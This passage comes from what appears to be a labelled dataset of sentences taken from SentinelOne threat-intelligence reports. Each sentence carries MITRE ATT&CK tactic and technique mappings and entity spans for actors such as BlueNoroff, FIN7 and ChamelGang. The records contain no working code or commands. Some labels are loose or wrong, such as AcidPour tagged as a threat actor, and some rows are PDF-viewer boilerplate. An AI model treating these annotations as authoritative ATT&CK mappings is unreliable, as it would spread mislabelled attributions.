Exploitation of Cloud and SaaS Platforms : The growing use of legitimate cloud infrastructure for malicious activities, such as Xeon Sender ’s abuse of SaaS APIs and Visual Studio Code tunneling for command-and-control, underscores the persistent misuse of trusted platforms to evade detection.", "sentence_text": "Resilience of Cybercrime Ecosystems : Despite disruptions, the cybercrime ecosystem showed significant resilience, with actors adapting by rebranding tools, forming new partnerships, and exploiting emerging technologies (e.g., NullBulge ‘s shift to supply chain attacks).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1588.005", "name": "Exploits" } ], "procedure": "Rebranding tools", "entities": [ { "text": " rebranding tools", "start": 138, "end": 155, "label": "Action" }, { "text": "exploiting emerging technologies", "start": 187, "end": 219, "label": "Action" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s7-d0c636", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "Resilience of Cybercrime Ecosystems : Despite disruptions, the cybercrime ecosystem showed significant resilience, with actors adapting by rebranding tools, forming new partnerships, and exploiting emerging technologies (e.g., NullBulge ‘s shift to supply chain attacks).", "sentence_text": "The reserch identified malware that was still in the planning and testing phases, indicating it was intended for future campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s8-402dcf", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "The reserch identified malware that was still in the planning and testing phases, indicating it was intended for future campaigns.", "sentence_text": "The threat actors appeared to have been experimenting with new infection methods, including using a technical threat research report as a decoy to appeal to cybersecurity professionals who consumed threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s9-f82bab", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "The threat actors appeared to have been experimenting with new infection methods, including using a technical threat research report as a decoy to appeal to cybersecurity professionals who consumed threat intelligence.", "sentence_text": "These activities are indicative of North Korea’s ongoing efforts to acquire strategic intelligence, likely aiming to access non-public information on cyber threats and defense strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s10-fc6b2e", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "These activities are indicative of North Korea’s ongoing efforts to acquire strategic intelligence, likely aiming to access non-public information on cyber threats and defense strategies.", "sentence_text": "The Doppelgänger operation targeted German audiences to spread propaganda and disinformation through news articles addressing socio-economic and geopolitical issues relevant to the general public.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1646", "name": "Influence Campaigns" } ], "procedure": "Target audiences to disseminate propaganda and disinformation through news content as part of an influence operation", "entities": [ { "text": "Doppelgänger operation", "start": 4, "end": 26, "label": "ThreatActor" }, { "text": "targeted German audiences", "start": 27, "end": 52, "label": "Action" }, { "text": "spread propaganda and disinformation", "start": 56, "end": 92, "label": "Action" }, { "text": "news articles", "start": 101, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s11-c45240", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "The Doppelgänger operation targeted German audiences to spread propaganda and disinformation through news articles addressing socio-economic and geopolitical issues relevant to the general public.", "sentence_text": "The disinformation campaign focused on criticizing the ruling government coalition and its support for Ukraine, likely aiming to sway public opinion ahead of Germany’s upcoming elections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s12-1e4e74", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "The disinformation campaign focused on criticizing the ruling government coalition and its support for Ukraine, likely aiming to sway public opinion ahead of Germany’s upcoming elections.", "sentence_text": "Its activities were amplified by a substantial network of X ( aka Twitter) accounts, engaging in coordinated efforts to boost visibility and audience engagement.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585.001", "name": "Social Media Accounts" } ], "procedure": "Amplify campaign content using a coordinated network of social media accounts.", "entities": [ { "text": "amplified by a substantial network of X ( aka Twitter) accounts", "start": 20, "end": 83, "label": "Action" }, { "text": "X ( aka Twitter)", "start": 58, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s13-6bbdbc", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "Its activities were amplified by a substantial network of X ( aka Twitter) accounts, engaging in coordinated efforts to boost visibility and audience engagement.", "sentence_text": "China was very much the focus of our researchers in February with the internal leak of documents from i-Soon , a Chinese state-affiliated hacking contractor working with agencies like the Ministry of State Security and the People’s Liberation Army.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s14-8574d9", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "China was very much the focus of our researchers in February with the internal leak of documents from i-Soon , a Chinese state-affiliated hacking contractor working with agencies like the Ministry of State Security and the People’s Liberation Army.", "sentence_text": "This month we also reported on an aggressive Chinese media campaign to shift narratives around U.S. hacking operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s16-86bc40", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "March", "sentence_text": "AcidPour enhances AcidRain’s destructive potential by incorporating Linux Unsorted Block Image (UBI) and Device Mapper (DM) logic, specifically targeting RAID arrays and large storage devices.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Enhanced malware to target RAID arrays and large storage devices", "entities": [ { "text": "AcidPour", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "AcidRain", "start": 18, "end": 26, "label": "MalwareTool" }, { "text": "incorporating Linux Unsorted Block Image (UBI) and Device Mapper (DM) logic", "start": 54, "end": 129, "label": "Action" }, { "text": "targeting RAID arrays and large storage devices", "start": 144, "end": 191, "label": "Action" }, { "text": "RAID arrays", "start": 154, "end": 165, "label": "Infrastructure_Indicator" }, { "text": "large storage devices", "start": 170, "end": 191, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s17-31b200", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "AcidPour enhances AcidRain’s destructive potential by incorporating Linux Unsorted Block Image (UBI) and Device Mapper (DM) logic, specifically targeting RAID arrays and large storage devices.", "sentence_text": "The discovery coincided with contemporaneous disruptions to Ukrainian telecommunication networks, which had been offline since March 13th.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s18-82af35", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "The discovery coincided with contemporaneous disruptions to Ukrainian telecommunication networks, which had been offline since March 13th.", "sentence_text": "Meanwhile, other groups like Dispossessor and Rabbit Hole DLS also appeared, repurposing data from previous ransomware attacks and offering platforms for smaller cybercriminals to monetize leaks, further expanding the ways stolen data is exploited.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s19-742507", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "Meanwhile, other groups like Dispossessor and Rabbit Hole DLS also appeared, repurposing data from previous ransomware attacks and offering platforms for smaller cybercriminals to monetize leaks, further expanding the ways stolen data is exploited.", "sentence_text": "May\nIn May 2024, SentinelLABS reported on the growing trend of politically-motivated hacktivist groups using ransomware payloads to further their political causes.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Used ransomware payloads", "entities": [ { "text": "hacktivist groups", "start": 85, "end": 102, "label": "ThreatActor" }, { "text": "using ransomware payloads", "start": 103, "end": 128, "label": "Action" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s20-5b4a7d", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "May\nIn May 2024, SentinelLABS reported on the growing trend of politically-motivated hacktivist groups using ransomware payloads to further their political causes.", "sentence_text": "Our report detailed several high-profile intrusions from the past three years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s21-fb4ab0", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "Our report detailed several high-profile intrusions from the past three years.", "sentence_text": "In 2022, ChamelGang , a suspected Chinese APT group, deployed CatB ransomware to target India’s AIIMS and Brazil’s Presidency, attacks that had not been previously publicly attributed.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Deployed ransomware to target India's AIIMS and Brazil's presidency", "entities": [ { "text": "ChamelGang ", "start": 9, "end": 20, "label": "ThreatActor" }, { "text": "CatB ", "start": 62, "end": 67, "label": "MalwareTool" }, { "text": "India’s AIIMS", "start": 88, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "Brazil’s Presidency", "start": 106, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "deployed CatB ransomware", "start": 53, "end": 77, "label": "Action" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s22-e0c8c9", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "In 2022, ChamelGang , a suspected Chinese APT group, deployed CatB ransomware to target India’s AIIMS and Brazil’s Presidency, attacks that had not been previously publicly attributed.", "sentence_text": "ChamelGang also struck a government agency in East Asia and critical infrastructure, including the aviation sector in India.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s23-73603a", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "ChamelGang also struck a government agency in East Asia and critical infrastructure, including the aviation sector in India.", "sentence_text": "While the actors behind these attacks remains unidentified, there are strong indications linking the incidents to Chinese and North Korean cyber activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s24-f1e0ea", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "While the actors behind these attacks remains unidentified, there are strong indications linking the incidents to Chinese and North Korean cyber activity.", "sentence_text": "July\nIn July, we reported on four new CapraRAT APKs associated with suspected Pakistan state-aligned actor Transparent Tribe .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s25-3bddb2", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "July\nIn July, we reported on four new CapraRAT APKs associated with suspected Pakistan state-aligned actor Transparent Tribe .", "sentence_text": "Importantly, NullBulge demonstrates a shift in the ransomware ecosystem where actors adopt hacktivist causes for financial gain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s26-9faed0", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "Importantly, NullBulge demonstrates a shift in the ransomware ecosystem where actors adopt hacktivist causes for financial gain.", "sentence_text": "This month also saw us report on recent FIN7 activity and our discovery of a new version of the AVNeutralizer toolkit designed to bypass EDR defense systems by leveraging the Windows built-in driver ProcLaunchMon.sys (TTD Monitor Driver).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1622", "name": "Debugger Evasion" }, { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Bypassed EDR defense systems by leveraging the Windows driver ProcLaunchMon.sys", "entities": [ { "text": "FIN7 ", "start": 40, "end": 45, "label": "ThreatActor" }, { "text": "AVNeutralizer toolkit", "start": 96, "end": 117, "label": "MalwareTool" }, { "text": " bypass EDR defense systems", "start": 129, "end": 156, "label": "Action" }, { "text": "Windows built-in driver ProcLaunchMon.sys", "start": 175, "end": 216, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s27-5070c4", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "This month also saw us report on recent FIN7 activity and our discovery of a new version of the AVNeutralizer toolkit designed to bypass EDR defense systems by leveraging the Windows built-in driver ProcLaunchMon.sys (TTD Monitor Driver).", "sentence_text": "First seen in 2022, the tool has been rebranded by multiple actors in the cloud hacktool scene.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Renamed tool", "entities": [ { "text": "cloud hacktool scene", "start": 74, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "rebranded", "start": 38, "end": 47, "label": "Action" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s28-9d6537", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "First seen in 2022, the tool has been rebranded by multiple actors in the cloud hacktool scene.", "sentence_text": "Xeon Sender enables spam operations using valid credentials for services like Amazon SNS, Twilio, and Nexmo, without exploiting vulnerabilities.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Used valid credentials for spam operations", "entities": [ { "text": "Xeon Sender", "start": 0, "end": 11, "label": "ThreatActor" }, { "text": "enables spam operations", "start": 12, "end": 35, "label": "Action" }, { "text": "valid credentials for services", "start": 42, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "Amazon SNS, Twilio, and Nexmo", "start": 78, "end": 107, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s29-280e35", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "Xeon Sender enables spam operations using valid credentials for services like Amazon SNS, Twilio, and Nexmo, without exploiting vulnerabilities.", "sentence_text": "Distributed through Telegram and hacking forums, it highlights the misuse of cloud infrastructure for malicious activity.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.007", "name": "Serverless" } ], "procedure": "Shared data through Telegram", "entities": [ { "text": "Telegram ", "start": 20, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "hacking forums", "start": 33, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "misuse of cloud infrastructure for malicious activity", "start": 67, "end": 120, "label": "Action" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s32-77d674", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "October", "sentence_text": "The report also criticized Microsoft and reflects ongoing initiatives to phase out foreign technology from PRC government systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s33-1f0f91", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "The report also criticized Microsoft and reflects ongoing initiatives to phase out foreign technology from PRC government systems.", "sentence_text": "SentinelLABS highlighted these narratives as part of a broader China state-directed propaganda strategy.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s34-641b97", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "SentinelLABS highlighted these narratives as part of a broader China state-directed propaganda strategy.", "sentence_text": "November\nNovember saw SentinelLABS report on two separate campaigns attributed to North Korea-alligned threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s35-3f6925", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "November\nNovember saw SentinelLABS report on two separate campaigns attributed to North Korea-alligned threat actors.", "sentence_text": "In a campaign we dubbed ‘ Hidden Risk ‘, a suspected DPRK threat actor was observed targeting Crypto-related businesses with novel multi-stage macOS malware.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "Targeted entities with multi-stage macOS malware", "entities": [ { "text": "DPRK threat actor", "start": 53, "end": 70, "label": "ThreatActor" }, { "text": "targeting Crypto-related businesses", "start": 84, "end": 119, "label": "Action" }, { "text": "multi-stage macOS malware", "start": 131, "end": 156, "label": "MalwareTool" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s36-2ae243", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "In a campaign we dubbed ‘ Hidden Risk ‘, a suspected DPRK threat actor was observed targeting Crypto-related businesses with novel multi-stage macOS malware.", "sentence_text": "SentinelLABS observed the use of a novel persistence mechanism abusing the Zsh configuration file zshenv", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Abused Zsh configuration file zhenv", "entities": [ { "text": "Zsh configuration file zshenv", "start": 75, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "abusing ", "start": 63, "end": 71, "label": "Action" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s37-8a09a1", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "SentinelLABS observed the use of a novel persistence mechanism abusing the Zsh configuration file zshenv", "sentence_text": "The campaign used emails propagating fake news about cryptocurrency trends to infect targets via a malicious application disguised as a PDF file.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Sent emails to infect targets by malware disguised as a PDF file", "entities": [ { "text": "used emails propagating fake news", "start": 13, "end": 46, "label": "Action" }, { "text": "malicious application disguised as a PDF file", "start": 99, "end": 144, "label": "MalwareTool" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s38-916ed8", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "The campaign used emails propagating fake news about cryptocurrency trends to infect targets via a malicious application disguised as a PDF file.", "sentence_text": "Analysis of both malware artifacts and network infrastructure led us to conclude with high confidence that the same actor was responsible for attacks attributed to BlueNoroff and the RustDoor/ThiefBucket and RustBucket campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s39-3c2a26", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "Analysis of both malware artifacts and network infrastructure led us to conclude with high confidence that the same actor was responsible for attacks attributed to BlueNoroff and the RustDoor/ThiefBucket and RustBucket campaigns.", "sentence_text": "This month we also reported on a network of websites tied to DPRK IT worker front companies , now seized by the U.S. government.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s40-53f4ef", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "This month we also reported on a network of websites tied to DPRK IT worker front companies , now seized by the U.S. government.", "sentence_text": "SentinelLABS attributed this activity to several active front companies and identified connections to a broader network of organizations operating in China, with additional entities in the DPRK IT Workers scheme still active today.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s42-7d6f8f", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "December", "sentence_text": "The attacks sought to establish strategic footholds and compromise downstream entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s43-ab4e3e", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "The attacks sought to establish strategic footholds and compromise downstream entities.", "sentence_text": "The campaign marked the first observed use of Visual Studio Code tunneling for command-and-control purposes, leveraging Microsoft-signed executables and Azure infrastructure to evade detection.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" }, { "id": "T1608", "name": "Stage Capabilities" } ], "procedure": "Used Visual Studio Code tunneling to leverage Microsoft-signed executables and Azure infrastructure to evade detection", "entities": [ { "text": "use of Visual Studio Code tunneling for command-and-control purposes", "start": 39, "end": 107, "label": "Action" }, { "text": "Visual Studio Code tunneling", "start": 46, "end": 74, "label": "Infrastructure_Indicator" }, { "text": " leveraging Microsoft-signed executables and Azure infrastructure", "start": 108, "end": 173, "label": "Action" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s44-884e07", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "The campaign marked the first observed use of Visual Studio Code tunneling for command-and-control purposes, leveraging Microsoft-signed executables and Azure infrastructure to evade detection.", "sentence_text": "Hacktivists repurposing ransomware for political gain, state-aligned actors exploiting legitimate tools for malicious purposes, and the continued commoditization of malware demonstrate just how adaptable and resourceful today’s threat actors are.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Exploited legitimate tools for malicious purposes", "entities": [ { "text": "Hacktivists ", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "ransomware ", "start": 24, "end": 35, "label": "Action" }, { "text": "exploiting legitimate tools for malicious purposes", "start": 76, "end": 126, "label": "Action" }, { "text": "state-aligned actors", "start": 55, "end": 75, "label": "ThreatActor" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s45-6f5042", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "Hacktivists repurposing ransomware for political gain, state-aligned actors exploiting legitimate tools for malicious purposes, and the continued commoditization of malware demonstrate just how adaptable and resourceful today’s threat actors are.", "sentence_text": "The increasing overlap between criminal and state-sponsored activities has complicated attribution for law enforcement, government and cybersecurity professionals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s46-a9ead9", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "The increasing overlap between criminal and state-sponsored activities has complicated attribution for law enforcement, government and cybersecurity professionals.", "sentence_text": "Legitimate platforms like cloud services and development tools have been co-opted to mask malicious operations, making detection and response even more challenging.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s47-148182", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "Legitimate platforms like cloud services and development tools have been co-opted to mask malicious operations, making detection and response even more challenging.", "sentence_text": "SentinelLABS’ research over the past year highlights the need for a collaborative, forward-looking approach to cybersecurity .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s48-e54786", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "SentinelLABS’ research over the past year highlights the need for a collaborative, forward-looking approach to cybersecurity .", "sentence_text": "By learning from these patterns and preparing for the evolving tactics of adversaries, we can help build stronger defenses for the future.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s49-5df149", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "By learning from these patterns and preparing for the evolving tactics of adversaries, we can help build stronger defenses for the future.", "sentence_text": "Like this article?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s50-d3f9c7", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "Like this article?", "sentence_text": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s51-0faabd", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "sentence_text": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s52-b1db23", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "sentence_text": "VISIT SITE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-53_SentinelOne_report-p1-s1-216e96", "source": "sentinel", "doc_id": "53_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "2025 Cloud Verified Exploit Paths and Secrets Scanning Threat Report Highlight", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-53_SentinelOne_report-p1-s2-18c43a", "source": "sentinel", "doc_id": "53_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "2025 Cloud Verified Exploit Paths and Secrets Scanning Threat Report Highlight", "sentence_text": "All Match Case Match Diacritics Whole Words Color Size Color Thickness Opacity Current View Current View Enter the password to open this PDF file:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-53_SentinelOne_report-p1-s3-ac50df", "source": "sentinel", "doc_id": "53_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "All Match Case Match Diacritics Whole Words Color Size Color Thickness Opacity Current View Current View Enter the password to open this PDF file:", "sentence_text": "File name:\nFile size:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-53_SentinelOne_report-p1-s4-308212", "source": "sentinel", "doc_id": "53_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "File name:\nFile size:", "sentence_text": "Title:\nAuthor:\nSubject:\nKeywords:\nCreation Date:\nModification Date:\nCreator:\nPDF Producer:\nPDF Version:\nPage Count:\nPage Size:\nFast Web View:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-53_SentinelOne_report-p1-s5-2ce1bd", "source": "sentinel", "doc_id": "53_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "Title:\nAuthor:\nSubject:\nKeywords:\nCreation Date:\nModification Date:\nCreator:\nPDF Producer:\nPDF Version:\nPage Count:\nPage Size:\nFast Web View:", "sentence_text": "Preparing document for printing… 0%", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s1-22a5e4", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "BlueNoroff Hidden Risk | Threat Actor Targets Macs with Fake Crypto News and Novel Persistence | SentinelOne Advanced Persistent Threat BlueNoroff", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s2-1af002", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "BlueNoroff Hidden Risk | Threat Actor Targets Macs with Fake Crypto News and Novel Persistence | SentinelOne Advanced Persistent Threat BlueNoroff", "sentence_text": "Hidden Risk | Threat Actor Targets Macs with Fake Crypto News and Novel Persistence Raffaele Sabato , Phil Stokes & Tom Hegel / November 7, 2024 Executive Summary SentinelLABS has observed a suspected DPRK threat actor targeting Crypto-related businesses with novel multi-stage malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1566.003", "name": "Spearphishing via Service" }, { "id": "T1659", "name": "Content Injection" } ], "procedure": "Targeted Macs with fake news", "entities": [ { "text": "Macs", "start": 35, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "Targets ", "start": 27, "end": 35, "label": "Action" }, { "text": " DPRK threat acto", "start": 200, "end": 217, "label": "ThreatActor" }, { "text": "targeting Crypto-related businesses", "start": 219, "end": 254, "label": "Action" }, { "text": "multi-stage malware", "start": 266, "end": 285, "label": "MalwareTool" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s3-05b7c9", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "Hidden Risk | Threat Actor Targets Macs with Fake Crypto News and Novel Persistence Raffaele Sabato , Phil Stokes & Tom Hegel / November 7, 2024 Executive Summary SentinelLABS has observed a suspected DPRK threat actor targeting 